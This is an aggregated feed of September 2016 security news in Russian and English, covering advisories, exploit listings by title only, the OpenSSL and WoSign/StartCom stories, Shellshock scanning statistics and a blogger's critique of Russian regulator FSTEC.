По слова источников, попытки несанкционированного доступа были зафиксированы в сентябре нынешнего года. В случае успешной атаки в руках злоумышленников мог бы оказаться большой объем различных данных, в том числе информация о звонках, текстовые сообщения, электронная почта, списки контактов и пр. По словам собеседников агентства, в попытках взлома подозреваются хакеры, спонсируемые российским правительством.

Сотрудники ФБР также проверяют, использовали ли хакеры данные, похищенные в результате взлома серверов Национального комитета Демократической партии США и связанных с ней организаций, ответственных за проведение выборов на различных уровнях.

Напомним, ранее Демократическая партия США призвала президента РФ Владимира Путина «отдать приказ» о прекращении попыток повлиять на президентские выборы (состоятся 8 ноября нынешнего года).

orig: 2016-09-28 05:59:11 / http://www.securitylab.ru/news/483957.php (click post title)

В текущем месяце было зафиксировано 20 тыс. сканирований систем на наличие Shellshock.

В минувшие выходные исполнилось ровно два года с момента обнаружения серьезной уязвимости Shellshock. Тем не менее, киберпреступники отнюдь не забыли о ней, о чем свидетельствуют собранные IBM X-Force данные телеметрии. Согласно этим данным, сканирование на наличие в UNIX-системах уязвимости Shellshock проводятся на регулярной основе.

Shellshock (CVE-2014-6271) является проблемой безопасности в GNU bash. Уязвимость затрагивает все выпущенные за последние 20 лет версии командной оболочки и все UNIX-системы, в которых они используются. Подробности о Shellshock были опубликованы 24 сентября 2014 года, и практически сразу же вышло исправление, однако владельцы серверов не спешили его устанавливать.

После того, как стало известно о проблеме, эксперты IBM зафиксировали порядка 2 тыс. инцидентов с использованием CVE-2014-6271. По их словам, с тех пор количество сканирований UNIX-систем на наличие данной уязвимости возросло в несколько сотен тысяч раз. Поскольку эксплоит для нее находится в открытом доступе, а использовать его проще простого, любой скучающий хакер-подросток мог атаковать уязвимые серверы лишь ради забавы.

По прошествии двух лет количество сканирований уменьшилось, но не намного – показатель нынешнего года такой же, как и в прошлом году, что удивительно для уязвимости двухлетней давности. По данным экспертов, количество сканирований на наличие уязвимости четырехлетней давности Heartbleed в среднем достигает нескольких сотен в месяц, тогда как для Shellshock этот показатель равен 10 тыс. Только в текущем месяце было осуществлено 20 тыс. сканирований.

46% всех сканируемых систем находятся в США. Свыше 46% систем принадлежат компаниям телекоммуникационной сферы и только 26% - финансовой.

orig: 2016-09-28 05:56:43 / http://www.securitylab.ru/news/483956.php (click post title)

Сайт ИСО 21 сентября 2016 года сообщил об официальной публикации ISO/IEC 19086-1:2016  «Информационные технологии – Облачные вычисления – Концепция соглашений о качестве услуг (SLA) – Часть 1: Обзор и понятия» (Information technology - Cloud computing - Service level agreement (SLA) framework - Part 1: Overview and concepts), см. http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=67545 , а также https://www.iso.org/obp/ui/#iso:std:iso-iec:19086:-1:ed-1:v1:en

Данный документ – первая из запланированных 4-х частей стандарта. Последующие части  будут посвящены модели метрик, требованиям, а также обеспечению безопасности и защиты персональных данных.

Стандарты ИСО по облачным вычислениям
Как отмечается во введении, данный документ стремится создать набор типовых «блоков» (понятия, термины, определения, контексты), используемых для формирования соглашений об уровне обслуживания (Service Level Agreement, SLA) при оказании облачных услуг. Стандарт содержит:

• Обзор «облачных» соглашений об уровне обслуживания


• Определяет  взаимосвязи между договорами об оказании облачных услуг и «облачными» SLA,


• Понятия, которые могут быть использованы для создания «облачных» SLA, и


• Термины, обычно используемые в облачных SLA.

orig: 2016-09-28 05:46:25 / http://rusrim.blogspot.com/2016/09/blog-post_69.html (click post title)

Из 34 представленных решений будут выбраны 8-10 разработок и переданы для дальнейшего тестирования пользователям в госучреждениях.

Экспертная группа из 50 человек проведет испытание мессенджеров, предназначенных для коммуникации российских чиновников. В настоящее время представлены 34 решения, из которых будут выбраны и переданы для дальнейшего тестирования пользователям из госучреждений 8-10 разработок, сообщают «Известия» со ссылкой на директора по проектной деятельности Института развития интернета (ИРИ) Арсения Щельцина.

Мессенджеры будут тестироваться в течение двух недель. По словам собеседника издания, эксперты смогут скачать приложения с краудсорсинговой платформы и проверить их совместимость с ключевыми операционными системами, а также оценить функциональность и удобство в использовании. Для проверки производительности и безопасности каждого мессенджера будут привлечены технические эксперты.

В тестировании принимают участие разработки компаний «МегаФон», «Ростелеком», «Ростех», «Билайн», Mail.Ru Group и пр. Как отмечают «Известия», все мессенджеры оснащены стандартными базовыми функциями. Некоторые из них предлагают интересные решения вопросов безопасности. В частности, в мессенджере «Ростеха» (создан дочерней компанией «РТ-Информ») предусмотрены два пароля - один для входа в программу, а другой - для мгновенного удаления всех данных.

orig: 2016-09-28 04:41:09 / http://www.securitylab.ru/news/483955.php (click post title)

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems.

orig: 2016-09-28 04:04:49 / https://packetstormsecurity.com/files/138886/lynis-2.3.4.tar.gz (click post title)

Ubuntu Security Notice 3090-1 - It was discovered that a flaw in processing a compressed text chunk in a PNG image could cause the image to have a large size when decompressed, potentially leading to a denial of service. Andrew Drake discovered that Pillow incorrectly validated input. A remote attacker could use this to cause Pillow to crash, resulting in a denial of service. Eric Soroos discovered that Pillow incorrectly handled certain malformed FLI, Tiff, and PhotoCD files. A remote attacker could use this issue to cause Pillow to crash, resulting in a denial of service. Various other issues were also addressed.

orig: 2016-09-28 04:03:12 / https://packetstormsecurity.com/files/138885/USN-3090-1.txt (click post title)

Debian Linux Security Advisory 3680-1 - Two vulnerabilities were reported in BIND, a DNS server.

orig: 2016-09-28 04:03:03 / https://packetstormsecurity.com/files/138884/dsa-3680-1.txt (click post title)

Red Hat Security Advisory 2016-1943-01 - KVM is a full virtualization solution for Linux on x86 hardware. Using KVM, one can run multiple virtual machines running unmodified Linux or Windows images. Each virtual machine has private virtualized hardware: a network card, disk, graphics adapter, etc. Security Fix: An out-of-bounds read/write access flaw was found in the way QEMU's VGA emulation with VESA BIOS Extensions support performed read/write operations using I/O port methods. A privileged guest user could use this flaw to execute arbitrary code on the host with the privileges of the host's QEMU process.

orig: 2016-09-28 04:02:54 / https://packetstormsecurity.com/files/138883/RHSA-2016-1943-01.txt (click post title)

Ubuntu Security Notice 3088-1 - It was discovered that Bind incorrectly handled building responses to certain specially crafted requests. A remote attacker could possibly use this issue to cause Bind to crash, resulting in a denial of service.

orig: 2016-09-28 04:02:49 / https://packetstormsecurity.com/files/138882/USN-3088-1.txt (click post title)

TP-Link Archer CR-700 suffers from a cross site scripting vulnerability.

orig: 2016-09-28 04:02:08 / https://packetstormsecurity.com/files/138881/tplinkarchercr700-xss.txt (click post title)

NetMan 204 suffers from having a backdoor account being installed by default.

orig: 2016-09-28 04:00:06 / https://packetstormsecurity.com/files/138880/netman204-backdoor.txt (click post title)

Разработчики проекта OpenBSD представили выпуск переносимой редакции пакета LibreSSL 2.5.0, в рамках которого развивается форк OpenSSL, нацеленный на обеспечение более высокого уровня безопасности. Новая ветка ознаменовала начало разработки версии, которая будет развиваться параллельно с OpenBSD 6.1 и войдёт в состав данного релиза. Ветка 2.5.x позиционируется как экспериментальная и дополняет стабильные ветки 2.3.x и 2.4.x, для которых доступны корректирующие обновления - 2.4.3 и 2.3.8. Проект LibreSSL ориентирован на качественную поддержку протоколов SSL/TLS с удалением излишней функциональности, добавлением дополнительных средств защиты и проведением значительной чистки и переработки кодовой базы.

orig: 2016-09-28 03:43:28 / http://www.opennet.ru/opennews/art.shtml?num=45228 (click post title)

На Дальинфокоме, который проходил в начале этой неделе во Владивостоке, я должен был читать презентацию с претензионным названием про дружбу козла Тимура и тигра Амура, которые ворвались в новостное поле российских СМИ и на долгое время задержались там ввиду нестандартности ситуации - хищник дружит со своим обедом. Ну и учитывая, что место этой дружбы находилось аккурат на Дальнем Востоке (вдаваться в разницу между Дальним Востоком и Приморьем я сейчас не буду :-), то мне показалось достаточно забавным назвать свою презентацию именно так. Именно в этом месте и в это время такое название было бы воспринято вполне адекватно, чего не скажешь о других регионах России (возможно). Но не самая лучшая организация (и смена организаторов) Дальинфокома привела к тому, что мое выступление отменилось; подозреваю, что даже и не предполагалось с самого начала :-(
Поэтому я не стал выкладывать презентацию в общий доступ, оставив ее в моих закромах на будущее. Однако три круглых стола, в которых мне довелось поучаствовать в рамках Дальинфокома, заставили меня немного пересмотреть свое решение - я все-таки выдерну несколько слайдов из презентации для визуализации того, о чем я хотел бы рассказать. Я думаю не столько долго погружаться и рассказывать, что такое тигры и козлы. Два вполне понятных и знакомых многим вида животных, один из которых пожирает другого. Причем часто второго отдают в качестве обеда первому (в зоопарках и сафари-парках так уж точно - дружба Тимура и Амура началась именно с этого "знакомства").
Если перевести этих представилетей фауны на область информационной безопасности, то окажется, что аналогия будет вполне уместной; причем сразу с множества сторон. Козлы могут предстать и в виде обманной системы, заманивающей хищников (хакеров) в ловушку. Тигры служат хорошей иллюстрацией как для хакеров, пожирающих (вламывающихся в информационные системы) ни в чем неповинных травоядных, так и для Tiger Team, занимающихся тем же самым, но с благими намерениями. Однако остановиться мне хотелось бы на другой аналогии, которая уравнивает российские госорганы с сакральной жервтой, которую государство по сути отдает на заклание хакерам.
Ведь если вдуматься, то так и происходит, и дискуссия на Дальинфокоме лишний раз меня в этом убедила. Государству нет дела до кибербезопасности госорганов и тем более муниципальных учреждений. Иначе как еще объяснить тот факт, что бюджеты на ИБ в госорганах урезаются, зарплаты специалистов по защите информации тоже не ахти какие, при этом самих специалистов не хватает, а штатных единиц под них не выделяют. Вспомним майское ПП-399 - оно как бы есть, но непонятно кто и за чей счет его будет выполнять. Потому что все понимают, денег нет, а ИБ госорганов в приоритеты государства не входит.

На Дальинфокоме, выступая в качестве адвоката дьявола, я все время пытался задать участникам простой вопрос - зачем им кибербезопасность? Угроз (массовых) у них нет. Штрафов за несоблюдение законодательства нет. Экономика для государственного или муниципального предприятия в ИБ почти отсутствует. Что движет госами в области ИБ? Энтузиазм? Привычка? Некоторые коллеги, участвующие в круглом столе, говорили, что угрозы есть, но мы про них не знаем. Штрафов нет, но есть увольнения чиновников за несоблюдение защитных мер. На мой вопрос про публичность этих фактов (и угроз, и увольнений), которые стали бы замечательным драйвером этой темы (как было у Роскомнадзора с персданными), полное молчание. Никто не хочет выносить сор из избы и самое главное сам регулятор (что ФСТЭК, что ФСБ) тоже этого почему-то не делают. Хотя на мой взгляд такая публичность сыграла бы им на руку и не пришлось бы лишний раз доказывать нужность занятий по кибербезопасности.

С ФСТЭК вообще ситуация не очень однозначная на сегодняшний день. Несколько лет подряд я хвалил этого регулятора, считая, что он выпустил и планирует выпустить очень нужные документы. 17-й, 21-й, 31-й приказы... Да, все так, но... с момента выхода этих приказов пока ФСТЭК больше ничего и не выпустил из обещанных документов. Где обещанная еще в 2015-м году методика моделирования угроз? Согласно новостям с прощедшей недавно InfoSecurity Russia, выход документа опять сдвинут - теперь на 2017-й год. А ведь еще в феврале срок был другой - март 2016-го. Как и проект новой редакции 17-го приказа, которую обещали выпустить для ознакомления и сбора комментариев осенью этого года. И где?

В январяе в банке данных угроз было 182 записи, а в сентябре... 186. За 9 месяцев всего 4 новых угрозы?! И это при том, что в феврале говорилось о нахождении на стадии рассмотрениия аж 140 новых угроз. И где они?

Идем дальше. Межсетевые экраны. В феврале появился долгожданный 9-й приказ ФСТЭК о введении в действие новых требований к МСЭ. Сами требования к МСЭ (профили защиты) появились на сайте ФСТЭК только 12-го сентября и, что самое интересное, ФСТЭК грозится аннулировать сертификаты и решения на сертификацию МСЭ по старым требованиям с 1-го декабря этого года. Иными словами на то, чтобы пройти сертификацию по новым требованиям у заявителей есть всего 2 с половиной месяца (уже два).

У ФСТЭК наблюдается катастрофическое несоблюдение ими же и озвученных дат выхода нормативных документов. И оно и понятно - они просто "зашиваются". Людей не хватает, руководство идет на повышение, прибавляется забот, рутина заедает, подбрасываются новые, более приоритетные задачи... Но старые дела и данные обещания никто не отменял... В итоге коллизия, которая будет только разрастаться. Я не предвижу ничего хорошего с точки зрения выпуска новых требований по безопасности и вполне допускаю, что многие из обещаний опять будут сдвинуты на еще более дальние сроки.

А страдают кто? Опять же госорганы. Это коммерческое предприятие может "забить болт" на требования сертификации или на иные документы регулятора и жить своим умом. Ни госы, ни муниципалы такой свободы позволить себе не могут. А регулятор бросает их на произвол судьбы, не имея физической возможности им помочь, и не желая озвучивать эти проблемы публично. Видимо надеятся на то, что успеют или проблема не всплывет. Мне знакомо это чувство, когда подходит крайний срок решения задачи, а к ее решению я даже не приступал. После дедлайна наступает либо апатия (а гори оно все синим пламенем), либо тебя нахлобучивает начальство за срыв обещаний. А кто может нахлобучить ФСТЭК? И за что? В плане нормотворческой деятельности ФСТЭК все обещанные документы не значатся (кроме парочки). А значит формально и взятки гладки.

А госорганы ждут. Ждут требований, ждут сертифицированных продуктов. На Дальинфокоме также озвучивалась проблема, что ФСТЭК, перейдя на сертификацию по профилям и новым РД, отказывается теперь сертифицировать по техническим условиям. И разослала соответствующие циркуляры по испытательным лабораториям. А что делать, когда РД на то или иное средство защиты еще нет? Например, на сканер безопасности или DLP или промышленный антивирус? Брать на себя ответственность и использовать несертифицированные СрЗИ? Не каждый госорган готов пойти на это. И получается дыра в системе безопасности, которой и пользуются "хищники". А госорган становится крайним, то есть козлом отпущения :-(

Вот такая аналогия с миром дикой природы родилась в процессе подготовки к участию в круглых столах по безопасности на Дальинфокоме. Будем надеяться, что хищники успеют "пожрать" не все госы и среди них найдутся "Тимуры", которые будут способны противостоять "тиграм" мира информационной безопасности, пока руководство зоопарка решает, как жить дальше.

orig: 2016-09-28 02:31:00 / http://lukatsky.blogspot.com/2016/09/blog-post_28.html (click post title)

FreePBX versions prior to 13.0.188 remote root exploit.

orig: 2016-09-28 01:11:11 / https://packetstormsecurity.com/files/138879/fpbx-13.x.rb.tt (click post title)

This security update addresses issues that were caused by patches included in the previous security update, released on 22nd September 2016. Given the Critical severity of one of these flaws they have chosen to release this advisory immediately to prevent upgrades to the affected version, rather than delaying in order to provide their usual public pre-notification.

orig: 2016-09-28 01:01:11 / https://packetstormsecurity.com/files/138887/secadv_20160926.txt (click post title)

Проведя расследование того, что творится с сертификатами, выданными китайским CA WoSign и предположительно купленным им StartCom (факт покупки скрывался и отрицался, но анализ показал, что с конца 2015 года StartCom использует либо инфраструктуру WoSign, либо ее клон), Mozilla опубликовала план действий, который предполагает столь жесткую меру как отзыв доверия сертификатам WoSign и StartCom в продуктах Mozilla с возможным восстановлением не ранее чем через год - и только в случае устранения замечаний.

Т.е. сертификаты, выданные WoSign/StartCom начиная с некой еще на названной даты, в этот счастливый момент превратятся в тыкву. У владельцев же старых сертификатов останется некоторое время на переезд к новому CA. Что является слабым утешением - из альтернативных бесплатных вариантов в голову приходит только Let's Encrypt, требующий установки своих скриптов для регулярного обновления сертификатов, живущих всего три месяца.
обсуждение | Telegram | Facebook | Twitter

orig: 2016-09-28 00:31:25 / https://bugtraq.ru/rsn/archive/2016/09/04.html (click post title)

Symantec Messaging Gateway 10.6.1 - Directory Traversal

orig: 2016-09-28 00:00:00 / https://www.exploit-db.com/exploits/40437/?rss (click post title)

VLC Media Player 2.2.1 - Buffer Overflow

orig: 2016-09-28 00:00:00 / https://www.exploit-db.com/exploits/40439/?rss (click post title)

Red Hat Security Advisory 2016-1939-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix: It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network.

orig: 2016-09-27 23:23:00 / https://packetstormsecurity.com/files/138876/RHSA-2016-1939-01.txt (click post title)

FireEye iSIGHT Intelligence have been tracking a pair of cybercriminals that we refer to as the “Vendetta Brothers.” This enterprising duo uses various strategies to compromise point-of-sale systems, steal payment card information and sell it on
their underground marketplace “Vendetta World.”

The Vendetta Brothers – who we believe operate from Spain and Eastern Europe – have been observed using everything from phishing to installing physical skimmers to steal payment card data, and their targets have mostly been located in the U.S. and Nordic countries.

Our latest report shines light on the Vendetta Brothers’ tactics, techniques and procedures, which involve the use of practices more commonly seen
in legitimate business, including outsourcing, partnerships, diversifying their market, and insulating liability.

We expect to see other cybercriminal groups using these more advanced techniques as a way of scaling their operations and increasing profits, all while mitigating risk and potentially frustrating investigators.

Download the report to learn more about the Vendetta Brothers.

orig: 2016-09-27 22:27:21 / http://www.fireeye.com/blog/threat-research/2016/09/vendetta_brothersi.html (click post title)

Разработчики OpenSSL выпустили экстренное обновление: патч, вышедший на прошлой неделе, привнес критическую уязвимость в криптографическую библиотеку. Новая проблема затрагивает лишь выпуск OpenSSL 1.1.0a, пользователям рекомендуется как можно скорее обновиться до 1.1.0b.

Провинившийся патч закрыл уязвимость CVE-2016-6307 — выделение чрезмерной памяти при выполнении функции tls_get_message_header(). Данная брешь была расценена как низкой степени опасности и могла вызвать отказ сервера.

Как оказалось, код заплатки повлек новую уязвимость, которая проявляется при получении сообщения размером более 16 Кбайт. Согласно описанию, в этом случае буфер, отведенный под сообщение, перераспределяется и меняет место.

«К сожалению, после этого остается висячий указатель на прежнее место буфера, что открывает возможность для записи в уже освобожденную область, — пишут разработчики в бюллетене. — Подобная ситуация, скорее всего, окончится крэшем, однако потенциально она позволяет исполнить произвольный код».

Новый выпуск OpenSSL устраняет также уязвимость, объявившуюся в другом недавнем апдейте, 1.0.2i. Данная брешь, CVE-2016-7052, вызвана отсутствием компонента, выполняющего проверку работоспособности списка отзыва сертификатов (CRL). Согласно бюллетеню, такая проверка была введена еще с выходом OpenSSL 1.1.0, а в обновление 1.0.2i ее попросту забыли включить. «В итоге любая попытка использования CRL на OpenSSL 1.0.2i оканчивается крэшем из-за исключения нулевого указателя», — гласит бюллетень OpenSSL. Релиз 1.0.2j исправляет эту ошибку.

orig: 2016-09-27 22:12:24 / https://threatpost.ru/openssl-fixes-critical-bug-introduced-by-latest-update/18348/ (click post title)

Приказом Федеральной антимонопольной службы от 28 июля 2016 г. № 1081/16 утвержден «Порядок представления в антимонопольный орган ходатайства или уведомления в электронной форме».
Для справки: Федеральный закон от 26 июля 2006 года № 135-ФЗ «О защите конкуренции» предусматривает, что ряд действий коммерческих организаций должны осуществляться либо с предварительного согласия антимонопольного органа, либо без предварительного согласия, но с последующим его уведомлением. Речь идет о:

• Создании и реорганизации коммерческих организаций, заключение соглашений между хозяйствующими субъектами-конкурентами о совместной деятельности (ст.27);


• Сделок с акциями, имуществом коммерческих организаций, правами в отношении коммерческих организаций (ст.28);


• Сделок с акциями (долями), активами финансовых организаций и правами в отношении финансовых организаций (ст.29);

• Лица, осуществляющие слияние и присоединение коммерческих и финансовых организаций, а также заключение между хозяйствующими субъектами-конкурентами соглашения о совместной деятельности на территории РФ;


• Лица или одно из лиц, которые принимают решение о создании коммерческой организации;


• Лица, приобретающие акции, имущество, активы хозяйствующих субъектов, права в отношении хозяйствующих субъектов в результате совершения сделок;


• Лица, на которых возложена обязанность уведомлять антимонопольный орган об осуществлении сделок, иных действий.

• Документы формируются в виде файла формата jpg, jpeg, gif, tif, tiff, docx, doc, rtf, txt, pdf, xls, xlsx, odt, гаг, zip за исключением документов, которые должны быть нотариально заверены;


• Нотариально заверенные документы формируются в соответствии с требованиями, установленными приказом Министерства юстиции РФ от 29.06.2015 № 155 «Об утверждении требований к формату изготовленного нотариусом электронного документа».

• Создает учетную запись, при ее отсутствии;


• Осуществляет вход в раздел «Личный кабинет»;


• Осуществляет переход по ссылке «Подать ходатайство»;


• Выбирает способ, которым будет подписано ходатайство или уведомление;


• Заполняет необходимые реквизиты;


• Прикрепляет документы и информацию;


• Подписывает ходатайство или уведомление;

orig: 2016-09-27 21:05:02 / http://rusrim.blogspot.com/2016/09/blog-post_91.html (click post title)

Ubuntu Security Notice 3089-1 - Sergey Bobrov discovered that Django incorrectly parsed cookies when being used with Google Analytics. A remote attacker could possibly use this issue to set arbitrary cookies leading to a CSRF protection bypass.

orig: 2016-09-27 19:33:00 / https://packetstormsecurity.com/files/138871/USN-3089-1.txt (click post title)